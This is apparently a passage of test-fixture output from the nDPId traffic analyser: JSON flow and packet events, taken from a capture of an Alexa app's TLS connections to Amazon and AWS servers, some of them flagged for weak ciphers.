{"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044509,"flow_last_seen":1490976044595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044595,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044521,"flow_last_seen":1490976044596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044596,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1490976044679,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044679,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WzRAAEAGfuWsECrYCsl+8Z0KH5BhrRWqAAAAAKAC\/\/9isAAAAgQFtAQCCAoA9k\/EAAAAAAEDAwg="} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":486,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976044502,"flow_last_seen":1490976044687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 
+01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":489,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044488,"flow_last_seen":1490976044687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":491,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976044521,"flow_last_seen":1490976044687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":495,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044509,"flow_last_seen":1490976044687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976043814,"flow_last_seen":1490976044708,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2075,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1490976044708,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":513,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1490976043814,"flow_last_seen":1490976044708,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4995,"flow_avg_l4_payload_len":454,"midstream":0,"thread_ts_msec":1490976044708,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":599,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976046418,"flow_last_seen":1490976046418,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976046418,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":599,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1490976046418,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976046418,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8dehAAEAG0QasECrYNF7ohrJwAbub2CWZAAAAAKAC\/\/+NLQAAAgQFtAQCCAoA9lBxAAAAAAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1490976046475,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976046475,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWCFAAOcGR9k0XuiGrBAq2AG7snCFN7lwm9glmnASH\/679wAAAgQFtAEDAwY="} 
+00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1490976046478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976046478,"pkt":"AMDKkaPvePiC0\/vCCABFAAAodelAAEAG0RmsECrYNF7ohrJwAbub2CWahTe5cVAQAVcGaQAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":602,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976046418,"flow_last_seen":1490976046478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976046478,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":605,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976046418,"flow_last_seen":1490976046847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976046847,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":615,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047014,"flow_last_seen":1490976047014,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047014,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1490976047014,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047014,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JC1AAEAG7\/2sECrYNu8YuoTxAbsotHSAAAAAAKAC\/\/+r6QAAAgQFtAQCCAoA9lCtAAAAAAEDAwg="} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047050,"flow_last_seen":1490976047050,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047050,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1490976047050,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047050,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8zEVAAEAGR+WsECrYNu8YuoTyAbvILJz0AAAAAKAC\/\/\/j9wAAAgQFtAQCCAoA9lCxAAAAAAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1490976047071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047071,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwYANAAOcGDTM27xi6rBAq2AG7hPHQ2dGWKLR0gXASH\/53JwAAAgQFtAEDAwY="} 
+00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1490976047073,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047073,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJC5AAEAG8BCsECrYNu8YuoTxAbsotHSB0NnRl1AQAVfBmAAA"} +00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047014,"flow_last_seen":1490976047075,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976047075,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047096,"flow_last_seen":1490976047096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047096,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1490976047096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047096,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Q4ZAAEAGA2msECrYNF7ohrJzAbuRhBMzAAAAAKAC\/\/+poAAAAgQFtAQCCAoA9lC1AAAAAAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1490976047107,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047107,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwYitAAOcGCws27xi6rBAq2AG7hPIGkxHQyCyc9XASH\/45RwAAAgQFtAEDAwY="} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":625,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1490976047109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047109,"pkt":"AMDKkaPvePiC0\/vCCABFAAAozEZAAEAGR\/isECrYNu8YuoTyAbvILJz1BpMR0VAQAVeDuAAA"} +00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047050,"flow_last_seen":1490976047111,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976047111,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":632,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047014,"flow_last_seen":1490976047133,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047133,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":636,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1490976047154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047154,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwRp1AAOcGWV00XuiGrBAq2AG7snPq5wFokYQTNHASH\/4rBwAAAgQFtAEDAwY="} 
+00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":637,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1490976047155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047155,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoQ4dAAEAGA3ysECrYNF7ohrJzAbuRhBM06ucBaVAQAVd1eAAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":638,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047096,"flow_last_seen":1490976047156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047156,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":641,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047050,"flow_last_seen":1490976047169,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047169,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":645,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976047096,"flow_last_seen":1490976047217,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976047217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":679,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047560,"flow_last_seen":1490976047560,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047560,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":679,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1490976047560,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047560,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8csJAAEAG6uOsECrYNFXR2NSbAbtgrSImAAAAAKAC\/\/+\/5AAAAgQFtAQCCAoA9lDkAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047563,"flow_last_seen":1490976047563,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047563,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 